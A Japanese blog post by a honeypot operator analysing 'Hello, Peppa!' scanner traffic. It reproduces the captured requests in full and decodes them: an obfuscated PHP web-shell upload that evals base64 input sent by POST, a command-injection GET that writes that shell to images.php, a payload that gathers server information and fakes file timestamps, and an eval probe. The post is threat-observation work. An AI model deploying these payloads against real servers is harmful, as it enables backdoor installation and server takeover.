Hello, Peppa!のアクセスログ
Hello, Peppa!
Hello, Peppa!という謎のアクセス - とりあえずブログ
「Hello, Peppa!」というこの気になるアクセス、私の運用しているWOWHoneypotにも来ていました。いくつかパターンがあったので、ログを抜き出してご紹介します。
ログその1
POST /cmx.php HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Go-http-client/1.1 Content-Length: 5433 Accept: */* Content-Type: multipart/form-data; boundary=------------------------c7145c544564e14d --------------------------c7145c544564e14d Content-Disposition: form-data; name="_upl" Upload --------------------------c7145c544564e14d Content-Disposition: form-data; name="h" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="w" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="leng" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="a" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="b" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="c" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="abc" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="0" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="cmd" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="php" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="1" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="bbs" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="m" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="js" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="2" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="3" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="!@#" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="ae" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="axa" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="aaaa" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="x" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="xx" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="eval" if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die(); --------------------------c7145c544564e14d Content-Disposition: form-data; name="file"; filename="E:\\PHPnow\\htdocs\\images.php" Content-Type: application/octet-stream <?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa! --------------------------c7145c544564e14d Content-Disposition: form-data; name="fileupload"; filename="E:\\PHPnow\\htdocs\\images.php" Content-Type: application/octet-stream <?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa! --------------------------c7145c544564e14d--
multipart/form-data はファイルアップロードなどに使われるデータ形式ですね。cmx.php はWebShellとして使用されるファイル名のようです。(参考 : ハニーポット観察記録(36)「phpMyAdminの設定不備を狙ったWebShell作成の試み」 at www.morihi-soc.net)
Base64エンコードされている部分のデコード結果は、以下のようになっていました。
session_start(); if(isset($_POST['code'])){ (substr(sha1(md5($_POST['a'])),36)=='222f') && $_SESSION['theCode']=trim($_POST['code']); } if(isset($_SESSION['theCode'])){ eval(base64_decode($_SESSION['theCode']));
処理自体に何か意味があるというよりは、これが実行できるかどうか、で脆弱性の有無を選り分けている感じでしょうか。
ログその2
POST /images.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Accept: */* Content-Length: 956 Content-Type: application/x-www-form-urlencoded a=just+for+fun&code=aWYgKCFmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSkKewoJJHVzZXIgPSBAZ2V0X2N1cnJlbnRfdXNlcigpOwoJJHVpZCA9IEBnZXRteXVpZCgpOwoJJGdpZCA9IEBnZXRteWdpZCgpOwoJJGdyb3VwID0gIj8iOwp9CmVsc2UKewoJJHVpZCA9IEBwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTsKCSRnaWQgPSBAcG9zaXhfZ2V0Z3JnaWQoQHBvc2l4X2dldGVnaWQoKSk7CgkkdWlkID0gJHVpZFsndWlkJ107CgkkdXNlciA9ICR1aWRbJ25hbWUnXTsKCSRnaWQgPSAkZ2lkWydnaWQnXTsKCSRncm91cCA9ICRnaWRbJ25hbWUnXTsKfQplY2hvICJIZWxsbywgUGVwcGEhfCIgLiBwaHBfdW5hbWUoKSAuIiArICIuICdVc2VyOicuJHVpZC4nKCcuJHVzZXIuJykvR3JvdXA6Jy4kZ2lkLicoJy4kZ3JvdXAuJyknIC4iICsgIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10gLiIgKyAiLiAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4iICsgIi4gJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddIC4gInwiOwokc2VsZiA9IHN1YnN0cigkX1NFUlZFUlsnUEhQX1NFTEYnXSxzdHJycG9zKCRfU0VSVkVSWydQSFBfU0VMRiddLCcvJykrMSk7CiR0aW1lID0gQHN0cnRvdGltZSgiMjAxNS0wNy0xNiAxNzozMjozMiIpOwplY2hvIChAdG91Y2goJHNlbGYsJHRpbWUsJHRpbWUpID8gJ3N1Y2Nlc3MnIDogJ2ZhaWxlZCcpOw%3D%3D
a=just+for+fun って本当にそうなのでしょうか……。その1と同様に、codeパラメータ以下をBase64デコードしてみると、以下のような結果となりました。
if (!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $uid = $uid['uid']; $user = $uid['name']; $gid = $gid['gid']; $group = $gid['name']; } echo "Hello, Peppa!|" . php_uname() ." + ". 'User:'.$uid.'('.$user.')/Group:'.$gid.'('.$group.')' ." + ".$_SERVER['SERVER_SOFTWARE'] ." + ". $_SERVER['DOCUMENT_ROOT'] ." + ". $_SERVER['SCRIPT_FILENAME'] . "|"; $self = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1); $time = @strtotime("2015-07-16 17:32:32"); ��ho (@touch($self,$time,$time) ? 'success' : 'failed');
最後の行はなぜか文字化けしてしまいましたが、おそらく「echo」ですね。サーバの情報をいろいろと出力させようとしている感じ。
ログその3
GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21 HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Go-http-client/1.1 Accept: */*
URLデコードすると以下のようになります。
echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?^> >images.php & echo Hello, Peppa!
$testの中の文字列は、ログその1のものと同じです。
ログその4
POST /db_session.init.php HTTP/1.1 Host: xxx.xxx.xxx.xxx:80 User-Agent: Mozilla/5.0 Connection: Close Content-Type: application/x-www-form-urlencoded Content-Length: 48 eval=die('Hello, Peppa!'.(string)(111111111*9));
こちらも処理自体にはそれほど意味はない気がしますね。
Hello, Peppa!、WOWHoneypotのログを見たところ、5月4日くらいから観測されているのですが、ネット上にはあまり情報が見られないです。検索してヒットする情報も、2018年の5月〜6月のものなので、何か新しいスキャナなのでしょうか……。引き続きログの観察と情報の収集を行っていきたいと思います。